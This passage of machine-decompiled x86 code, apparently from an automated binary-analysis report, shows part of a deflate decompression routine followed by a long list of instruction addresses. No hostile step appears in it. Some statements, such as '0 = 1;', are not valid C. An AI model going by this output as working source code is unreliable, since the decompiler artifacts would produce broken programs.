											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t412 =  *0x40a444; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a448; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d24c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d248; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d250;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6d0;
													if(_t416 < 0x42d6d0) {
														L15:
														__eflags = _t416 - 0x42d48c;
														_t438 = 8;
														if(_t416 > 0x42d48c) {
															__eflags = _t416 - 0x42d650;
															if(_t416 >= 0x42d650) {
																__eflags = _t416 - 0x42d6b0;
																if(_t416 < 0x42d6b0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d250, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d250 + _t440;
														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
														 *0x42e3d0 =  *0x42e3d0 + 1;
														__eflags =  *0x42e3d0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                    0x00406a9b
                                                                    0x00406a9b
                                                                    0x00406a9b
                                                                    0x00406a9b
                                                                    0x00406a9b
                                                                    0x00406a9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406aa5
                                                                    0x00406aa5
                                                                    0x00406aa8
                                                                    0x00406aab
                                                                    0x00406ab0
                                                                    0x00406ab2
                                                                    0x00406ab5
                                                                    0x00406ab8
                                                                    0x00406abb
                                                                    0x00406abb
                                                                    0x00406abe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ac0
                                                                    0x00406ac0
                                                                    0x00406ac3
                                                                    0x00406ac8
                                                                    0x00406aca
                                                                    0x00406acd
                                                                    0x00406ad3
                                                                    0x00406832
                                                                    0x00406832
                                                                    0x00406835
                                                                    0x0040683b
                                                                    0x00406841
                                                                    0x0040684a
                                                                    0x00406850
                                                                    0x00406853
                                                                    0x0040685a
                                                                    0x0040685f
                                                                    0x00406865
                                                                    0x00406870
                                                                    0x00406870
                                                                    0x00406ad9
                                                                    0x00406ad9
                                                                    0x00406ae3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ae9
                                                                    0x00406ae9
                                                                    0x00406aed
                                                                    0x00406af0
                                                                    0x00406af0
                                                                    0x00406af4
                                                                    0x00406afa
                                                                    0x00406afa
                                                                    0x00406afd
                                                                    0x00406b00
                                                                    0x00406b06
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406b08
                                                                    0x00406b2a
                                                                    0x00406b2a
                                                                    0x00406b2d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406b0a
                                                                    0x00406b0e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406b14
                                                                    0x00406b14
                                                                    0x00406b17
                                                                    0x00406b1a
                                                                    0x00406b1f
                                                                    0x00406b21
                                                                    0x00406b24
                                                                    0x00406b27
                                                                    0x00406b27
                                                                    0x00406b2f
                                                                    0x00406b2f
                                                                    0x00406b35
                                                                    0x00406b38
                                                                    0x00406b3b
                                                                    0x00406b3b
                                                                    0x00406b42
                                                                    0x00406b46
                                                                    0x00406b4a
                                                                    0x00406b4d
                                                                    0x00406b50
                                                                    0x00406b56
                                                                    0x00406b5b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406b5d
                                                                    0x00406b71
                                                                    0x00406b71
                                                                    0x00406b75
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406b5f
                                                                    0x00406b62
                                                                    0x00406b62
                                                                    0x00406b69
                                                                    0x00406b6e
                                                                    0x00406b6e
                                                                    0x00406b6e
                                                                    0x00406b77
                                                                    0x00406b77
                                                                    0x00406b7a
                                                                    0x00406b88
                                                                    0x00406b8e
                                                                    0x00406b93
                                                                    0x00406b99
                                                                    0x00406b9f
                                                                    0x00406ba5
                                                                    0x00406bac
                                                                    0x00406bc0
                                                                    0x00406bc0
                                                                    0x0040718f
                                                                    0x0040718f
                                                                    0x0040718f
                                                                    0x00407194
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067cc
                                                                    0x004067cc
                                                                    0x00000000
                                                                    0x00406dc7
                                                                    0x00406dc7
                                                                    0x00406dcb
                                                                    0x00406dce
                                                                    0x00406dd1
                                                                    0x00406dd4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406dda
                                                                    0x00406dda
                                                                    0x00406dff
                                                                    0x00406dff
                                                                    0x00406dff
                                                                    0x00406e01
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ddf
                                                                    0x00406ddf
                                                                    0x00406de3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406de9
                                                                    0x00406de9
                                                                    0x00406dec
                                                                    0x00406def
                                                                    0x00406df2
                                                                    0x00406df4
                                                                    0x00406df6
                                                                    0x00406df9
                                                                    0x00406dfc
                                                                    0x00406dfc
                                                                    0x00406dfc
                                                                    0x00406e03
                                                                    0x00406e03
                                                                    0x00406e0b
                                                                    0x00406e0e
                                                                    0x00406e11
                                                                    0x00406e14
                                                                    0x00406e18
                                                                    0x00406e1b
                                                                    0x00406e1d
                                                                    0x00406e20
                                                                    0x00406e22
                                                                    0x00406e36
                                                                    0x00406e36
                                                                    0x00406e39
                                                                    0x00406e53
                                                                    0x00406e53
                                                                    0x00406e56
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e5c
                                                                    0x00406e5c
                                                                    0x00406e5f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00000000
                                                                    0x00406e65
                                                                    0x00406e3b
                                                                    0x00406e3e
                                                                    0x00406e45
                                                                    0x00406e48
                                                                    0x00000000
                                                                    0x00406e48
                                                                    0x00406e24
                                                                    0x00406e28
                                                                    0x00406e2b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e70
                                                                    0x00406e70
                                                                    0x00406e95
                                                                    0x00406e95
                                                                    0x00406e95
                                                                    0x00406e97
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e75
                                                                    0x00406e75
                                                                    0x00406e79
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e7f
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8a
                                                                    0x00406e8c
                                                                    0x00406e8f
                                                                    0x00406e92
                                                                    0x00406e92
                                                                    0x00406e92
                                                                    0x00406e99
                                                                    0x00406ea1
                                                                    0x00406ea4
                                                                    0x00406ea7
                                                                    0x00406ea9
                                                                    0x00406eac
                                                                    0x00406eac
                                                                    0x00406eae
                                                                    0x00406eb2
                                                                    0x00406eb5
                                                                    0x00406eb8
                                                                    0x00406ebb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ec1
                                                                    0x00406ec1
                                                                    0x00406ee6
                                                                    0x00406ee6
                                                                    0x00406ee6
                                                                    0x00406ee8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ec6
                                                                    0x00406ec6
                                                                    0x00406eca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed9
                                                                    0x00406edb
                                                                    0x00406edd
                                                                    0x00406ee0
                                                                    0x00406ee3
                                                                    0x00406ee3
                                                                    0x00406ee3
                                                                    0x00406eea
                                                                    0x00406eea
                                                                    0x00406ef2
                                                                    0x00406ef5
                                                                    0x00406ef8
                                                                    0x00406efb
                                                                    0x00406eff
                                                                    0x00406f02
                                                                    0x00406f04
                                                                    0x00406f07
                                                                    0x00406f0a
                                                                    0x00406f24
                                                                    0x00406f24
                                                                    0x00406f27
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f2d
                                                                    0x00406f2d
                                                                    0x00406f30
                                                                    0x00406f37
                                                                    0x00000000
                                                                    0x00406f37
                                                                    0x00406f0c
                                                                    0x00406f0f
                                                                    0x00406f16
                                                                    0x00406f19
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f3f
                                                                    0x00406f3f
                                                                    0x00406f64
                                                                    0x00406f64
                                                                    0x00406f64
                                                                    0x00406f66
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f4e
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f59
                                                                    0x00406f5b
                                                                    0x00406f5e
                                                                    0x00406f61
                                                                    0x00406f61
                                                                    0x00406f61
                                                                    0x00406f68
                                                                    0x00406f70
                                                                    0x00406f73
                                                                    0x00406f76
                                                                    0x00406f78
                                                                    0x00406f7b
                                                                    0x00406f7b
                                                                    0x00406f7d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f83
                                                                    0x00406f83
                                                                    0x00406f86
                                                                    0x00406f8b
                                                                    0x00406f8d
                                                                    0x00406f93
                                                                    0x00406f95
                                                                    0x00406faa
                                                                    0x00406fac
                                                                    0x00406fac
                                                                    0x00406f97
                                                                    0x00406f9d
                                                                    0x00406f9f
                                                                    0x00406fa1
                                                                    0x00406fa1
                                                                    0x00406fae
                                                                    0x00406fb2
                                                                    0x00406fb5
                                                                    0x00406fbb
                                                                    0x00406fbb
                                                                    0x00406fbe
                                                                    0x00406fbe
                                                                    0x00406fbe
                                                                    0x00406fc0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406fc6
                                                                    0x00406fc6
                                                                    0x00406fcc
                                                                    0x00406fce
                                                                    0x00406ff3
                                                                    0x00406ff6
                                                                    0x00406ffc
                                                                    0x00407001
                                                                    0x00407007
                                                                    0x0040700d
                                                                    0x0040700f
                                                                    0x00407012
                                                                    0x0040701b
                                                                    0x00407021
                                                                    0x00407021
                                                                    0x00407014
                                                                    0x00407016
                                                                    0x00407018
                                                                    0x00407018
                                                                    0x00407023
                                                                    0x00407029
                                                                    0x0040702b
                                                                    0x0040702e
                                                                    0x00407030
                                                                    0x00407036
                                                                    0x00407038
                                                                    0x0040703a
                                                                    0x0040703c
                                                                    0x0040703e
                                                                    0x00407041
                                                                    0x0040704a
                                                                    0x0040704d
                                                                    0x0040704d
                                                                    0x00407043
                                                                    0x00407043
                                                                    0x00407046
                                                                    0x00407046
                                                                    0x00407041
                                                                    0x00407038
                                                                    0x0040704f
                                                                    0x00407051
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407051
                                                                    0x00406fd0
                                                                    0x00406fd0
                                                                    0x00406fd6
                                                                    0x00406fdc
                                                                    0x00406fde
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406fe0
                                                                    0x00406fe0
                                                                    0x00406fe2
                                                                    0x00406fe4
                                                                    0x00406fed
                                                                    0x00406fed
                                                                    0x00406fe6
                                                                    0x00406fe6
                                                                    0x00406fe9
                                                                    0x00406fe9
                                                                    0x00406fef
                                                                    0x00406ff1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407057
                                                                    0x00407057
                                                                    0x0040705c
                                                                    0x0040705e
                                                                    0x0040705f
                                                                    0x00407060
                                                                    0x00407061
